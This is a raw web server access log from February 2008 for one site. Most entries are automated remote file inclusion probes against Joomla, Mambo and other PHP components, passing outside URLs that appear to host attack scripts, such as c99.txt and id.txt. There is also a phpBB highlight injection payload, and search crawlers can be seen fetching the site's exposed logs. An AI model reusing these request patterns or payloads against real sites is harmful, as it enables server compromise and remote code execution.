87.106.101.159 - - [04/Feb/2008:04:41:47 -0800] "GET /logs/index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.233.4.83 - - [04/Feb/2008:04:41:58 -0800] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://real-spam.com/c99.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
221.143.56.18 - - [04/Feb/2008:04:45:34 -0800] "GET /logs/access_080103.log HTTP/1.1" 200 448825 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
222.135.109.228 - - [04/Feb/2008:04:45:49 -0800] "GET /logs/access_080108.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://ecology.275mb.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.135.109.228 - - [04/Feb/2008:04:45:50 -0800] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://ecology.275mb.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.135.109.228 - - [04/Feb/2008:04:45:50 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://ecology.275mb.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.149.115.250 - - [04/Feb/2008:04:45:58 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.blackjackclub.cl/borda3.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.172.55.178 - - [04/Feb/2008:04:46:40 -0800] "GET /logs/access_071214.log//skin/zero_vote/ask_password.php?dir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.172.55.178 - - [04/Feb/2008:04:46:40 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.172.55.178 - - [04/Feb/2008:04:46:41 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.116.0.130 - - [04/Feb/2008:04:47:18 -0800] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://AstroIndo.Org/box/IndoID?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.149.115.250 - - [04/Feb/2008:04:49:34 -0800] "GET /logs/access_071225.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.blackjackclub.cl/borda3.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.149.115.250 - - [04/Feb/2008:04:51:09 -0800] "GET /logs/access_080118.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.blackjackclub.cl/borda3.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.50.243.66 - - [04/Feb/2008:04:52:51 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://AstroIndo.Org/box/IndoID?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.160.72.103 - - [04/Feb/2008:04:53:05 -0800] "GET /logs//////////?mosConfig_absolute_path=http://uniquantum.co.kr/.../robot.txt?? HTTP/1.1" 200 33126 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
209.160.72.103 - - [04/Feb/2008:04:53:05 -0800] "GET //////////?mosConfig_absolute_path=http://uniquantum.co.kr/.../robot.txt?? HTTP/1.1" 200 2970 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
69.72.161.50 - - [04/Feb/2008:04:54:06 -0800] "GET /logs//////////?mosConfig_absolute_path=http://mosquitomagnetreview.com/gallery2.gif??? HTTP/1.1" 200 33126 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
69.72.161.50 - - [04/Feb/2008:04:54:06 -0800] "GET //////////?mosConfig_absolute_path=http://mosquitomagnetreview.com/gallery2.gif??? HTTP/1.1" 200 2970 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
74.6.26.160 - - [04/Feb/2008:04:55:32 -0800] "GET /mobileoffice/ HTTP/1.0" 200 5008 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
69.50.243.66 - - [04/Feb/2008:04:55:40 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://AstroIndo.Org/box/IndoID?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.50.243.66 - - [04/Feb/2008:04:55:40 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://AstroIndo.Org/box/IndoID?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.50.243.66 - - [04/Feb/2008:04:56:41 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://AstroIndo.Org/box/IndoID?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.50.243.66 - - [04/Feb/2008:04:57:44 -0800] "GET /logs/access_080108.log/components/com_performs/performs.php?mosConfig_absolute_path=http://AstroIndo.Org/box/IndoID?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.50.243.66 - - [04/Feb/2008:04:57:44 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://AstroIndo.Org/box/IndoID?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.50.243.66 - - [04/Feb/2008:04:57:44 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://AstroIndo.Org/box/IndoID?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.24.222 - - [04/Feb/2008:04:58:16 -0800] "GET /mobileoffice/?S=A HTTP/1.0" 200 5008 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
213.200.252.210 - - [04/Feb/2008:04:58:19 -0800] "GET /logs/access_080117.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://photographersusa.com/catimages/.../.../ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.200.252.210 - - [04/Feb/2008:04:58:19 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://photographersusa.com/catimages/.../.../ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.200.252.210 - - [04/Feb/2008:04:58:20 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://photographersusa.com/catimages/.../.../ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.246.41.206 - - [04/Feb/2008:04:58:44 -0800] "GET /logs/access_080117.log//sohoadmin/program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://www.citoyennete-active.org/mambots/content/test.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.41.206 - - [04/Feb/2008:04:58:44 -0800] "GET //sohoadmin/program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://www.citoyennete-active.org/mambots/content/test.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.41.206 - - [04/Feb/2008:04:58:45 -0800] "GET /logs//sohoadmin/program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://www.citoyennete-active.org/mambots/content/test.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.172.55.178 - - [04/Feb/2008:05:00:45 -0800] "GET /logs/access_080108.log/components/com_performs/performs.php?mosConfig_absolute_path=http://ecology.275mb.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.172.55.178 - - [04/Feb/2008:05:00:46 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://ecology.275mb.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.172.55.178 - - [04/Feb/2008:05:00:46 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://ecology.275mb.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.214.20.213 - - [04/Feb/2008:05:01:01 -0800] "GET /logs//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.hoopstar.ru/dm?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
85.214.20.213 - - [04/Feb/2008:05:01:01 -0800] "GET //geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.hoopstar.ru/dm?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
81.31.151.26 - - [04/Feb/2008:05:02:02 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://mykonos.bargaingreece.com//components/com_log/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.116.0.130 - - [04/Feb/2008:05:03:56 -0800] "GET /logs/access_080106.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://AstroIndo.Org/box/IndoID?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.116.0.130 - - [04/Feb/2008:05:03:56 -0800] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://AstroIndo.Org/box/IndoID?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.116.0.130 - - [04/Feb/2008:05:03:56 -0800] "GET /logs/access_080108.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://AstroIndo.Org/box/IndoID?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.31.151.26 - - [04/Feb/2008:05:04:23 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://mykonos.bargaingreece.com//components/com_log/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.88.47.161 - - [04/Feb/2008:05:04:29 -0800] "GET /logs/access_080103.log//modules/Neos_Chronos/header.php?base_folder=http://207.35.44.70/jeangerard/gerard/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.88.47.161 - - [04/Feb/2008:05:04:30 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://207.35.44.70/jeangerard/gerard/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.88.47.161 - - [04/Feb/2008:05:04:30 -0800] "GET /logs//modules/Neos_Chronos/header.php?base_folder=http://207.35.44.70/jeangerard/gerard/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.249.70.19 - - [04/Feb/2008:05:04:31 -0800] "GET /logs/access_070711.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
72.30.214.232 - - [04/Feb/2008:05:06:20 -0800] "GET /logs/access_071230.log HTTP/1.0" 200 231687 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
69.88.47.161 - - [04/Feb/2008:05:09:57 -0800] "GET /logs/access_071220.log//modules/Neos_Chronos/header.php?base_folder=http://207.35.44.70/jeangerard/gerard/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.18.66 - - [04/Feb/2008:05:10:48 -0800] "GET /logs/access_080103.log//modules/Neos_Chronos/header.php?base_folder=http://www.secureonsites.com/_vti_var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.18.66 - - [04/Feb/2008:05:10:48 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://www.secureonsites.com/_vti_var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.18.66 - - [04/Feb/2008:05:10:48 -0800] "GET /logs//modules/Neos_Chronos/header.php?base_folder=http://www.secureonsites.com/_vti_var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.249.70.19 - - [04/Feb/2008:05:11:33 -0800] "GET /logs/access_070803.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
67.195.44.108 - - [04/Feb/2008:05:12:56 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.44.102 - - [04/Feb/2008:05:12:57 -0800] "GET /logs/access_071229.log HTTP/1.0" 200 314379 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.249.70.19 - - [04/Feb/2008:05:13:09 -0800] "GET /logs/access_071129.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.70.19 - - [04/Feb/2008:05:13:09 -0800] "GET /logs/access_071128.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
64.15.159.44 - - [04/Feb/2008:05:13:50 -0800] "GET /logs/access_080117.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.15.159.44 - - [04/Feb/2008:05:13:51 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.15.159.44 - - [04/Feb/2008:05:13:51 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.31.151.26 - - [04/Feb/2008:05:14:17 -0800] "GET /logs/access_080103.log//modules/Neos_Chronos/header.php?base_folder=http://mykonos.bargaingreece.com//components/com_log/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.31.151.26 - - [04/Feb/2008:05:14:18 -0800] "GET /logs//modules/Neos_Chronos/header.php?base_folder=http://mykonos.bargaingreece.com//components/com_log/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.31.151.26 - - [04/Feb/2008:05:14:21 -0800] "GET /logs/access_080103.log//modules/Neos_Chronos/header.php?base_folder=http://mykonos.bargaingreece.com//components/com_log/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.31.151.26 - - [04/Feb/2008:05:14:21 -0800] "GET /logs//modules/Neos_Chronos/header.php?base_folder=http://mykonos.bargaingreece.com//components/com_log/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.18.66 - - [04/Feb/2008:05:14:27 -0800] "GET /logs/access_071220.log//modules/Neos_Chronos/header.php?base_folder=http://www.secureonsites.com/_vti_var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.25.135 - - [04/Feb/2008:05:14:57 -0800] "GET /presto/?D=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
87.106.101.159 - - [04/Feb/2008:05:15:22 -0800] "GET /logs/access_071230.log/index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.249.70.19 - - [04/Feb/2008:05:15:51 -0800] "GET /logs/access_071202.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.70.19 - - [04/Feb/2008:05:16:28 -0800] "GET /logs/access_071127.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.70.19 - - [04/Feb/2008:05:16:28 -0800] "GET /logs/access_071204.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.70.19 - - [04/Feb/2008:05:16:28 -0800] "GET /logs/access_071201.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
213.200.252.210 - - [04/Feb/2008:05:16:51 -0800] "GET /logs/access_080117.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://photographersusa.com/catimages/.../.../idku.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.200.252.210 - - [04/Feb/2008:05:16:53 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://photographersusa.com/catimages/.../.../idku.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.200.252.210 - - [04/Feb/2008:05:16:54 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://photographersusa.com/catimages/.../.../idku.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.249.70.19 - - [04/Feb/2008:05:16:57 -0800] "GET /logs/access_071119.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.70.19 - - [04/Feb/2008:05:16:57 -0800] "GET /logs/ HTTP/1.1" 200 33797 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.70.19 - - [04/Feb/2008:05:17:10 -0800] "GET /logs/access_080109.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.70.19 - - [04/Feb/2008:05:17:26 -0800] "GET /logs/access_070806.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
81.31.151.26 - - [04/Feb/2008:05:17:55 -0800] "GET /logs/access_071220.log//modules/Neos_Chronos/header.php?base_folder=http://mykonos.bargaingreece.com//components/com_log/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.18.66 - - [04/Feb/2008:05:18:11 -0800] "GET /logs/access_080117.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.secureonsites.com/_vti_var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.18.66 - - [04/Feb/2008:05:18:11 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.secureonsites.com/_vti_var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.18.66 - - [04/Feb/2008:05:18:11 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.secureonsites.com/_vti_var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.31.151.26 - - [04/Feb/2008:05:18:16 -0800] "GET /logs/access_071220.log//modules/Neos_Chronos/header.php?base_folder=http://mykonos.bargaingreece.com//components/com_log/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.18.66 - - [04/Feb/2008:05:18:41 -0800] "GET /logs/access_080103.log//modules/Neos_Chronos/header.php?base_folder=http://www.secureonsites.com/_vti_var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.18.66 - - [04/Feb/2008:05:18:41 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://www.secureonsites.com/_vti_var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.18.66 - - [04/Feb/2008:05:18:41 -0800] "GET /logs//modules/Neos_Chronos/header.php?base_folder=http://www.secureonsites.com/_vti_var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.249.70.19 - - [04/Feb/2008:05:19:14 -0800] "GET /logs/access_071203.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
69.72.161.50 - - [04/Feb/2008:05:19:32 -0800] "GET //////////?mosConfig_absolute_path=http://203.71.212.3/www/d.txt?? HTTP/1.1" 200 2970 "-" "libwww-perl/5.808" "www.dmulk.com"
213.200.252.210 - - [04/Feb/2008:05:21:27 -0800] "GET /logs/access_071225.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://photographersusa.com/catimages/.../.../ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.72.161.50 - - [04/Feb/2008:05:21:37 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://mosquitomagnetreview.com/gallery2.gif??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
69.72.161.50 - - [04/Feb/2008:05:21:37 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://mosquitomagnetreview.com/gallery2.gif??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
218.189.222.164 - - [04/Feb/2008:05:22:06 -0800] "GET /index.php?optionhttp://autodelen.net//downloads/documenten/documenten.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.18.66 - - [04/Feb/2008:05:22:20 -0800] "GET /logs/access_071220.log//modules/Neos_Chronos/header.php?base_folder=http://www.secureonsites.com/_vti_var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.249.70.19 - - [04/Feb/2008:05:22:22 -0800] "GET /logs/access_071126.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
218.189.222.164 - - [04/Feb/2008:05:22:23 -0800] "GET /logs/access_071229.log/index.php?optionhttp://autodelen.net//downloads/documenten/documenten.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.189.222.164 - - [04/Feb/2008:05:22:24 -0800] "GET /logs/index.php?optionhttp://autodelen.net//downloads/documenten/documenten.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.249.70.19 - - [04/Feb/2008:05:22:59 -0800] "GET /logs/access_071115.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.70.19 - - [04/Feb/2008:05:23:00 -0800] "GET /logs/access_071010.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
216.75.63.66 - - [04/Feb/2008:05:23:26 -0800] "GET /logs/access_080118.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.75.63.66 - - [04/Feb/2008:05:23:26 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.75.63.66 - - [04/Feb/2008:05:23:26 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.160.72.103 - - [04/Feb/2008:05:23:44 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://uniquantum.co.kr/.../robot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
209.160.72.103 - - [04/Feb/2008:05:23:44 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://uniquantum.co.kr/.../robot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
216.75.63.66 - - [04/Feb/2008:05:23:44 -0800] "GET /logs/access_071229.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.204.128 - - [04/Feb/2008:05:24:16 -0800] "GET /logs/access_071216.log//index.php?name=PNphpBB2&file=viewtopic&t=8//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://digitalmediawire.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.75.204.128 - - [04/Feb/2008:05:24:16 -0800] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://digitalmediawire.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.75.204.128 - - [04/Feb/2008:05:24:17 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://digitalmediawire.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
64.15.159.44 - - [04/Feb/2008:05:26:31 -0800] "GET /logs/access_071225.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.75.204.128 - - [04/Feb/2008:05:26:41 -0800] "GET /logs/access_080105.log//index.php?name=PNphpBB2&file=viewtopic&t=8//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://digitalmediawire.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
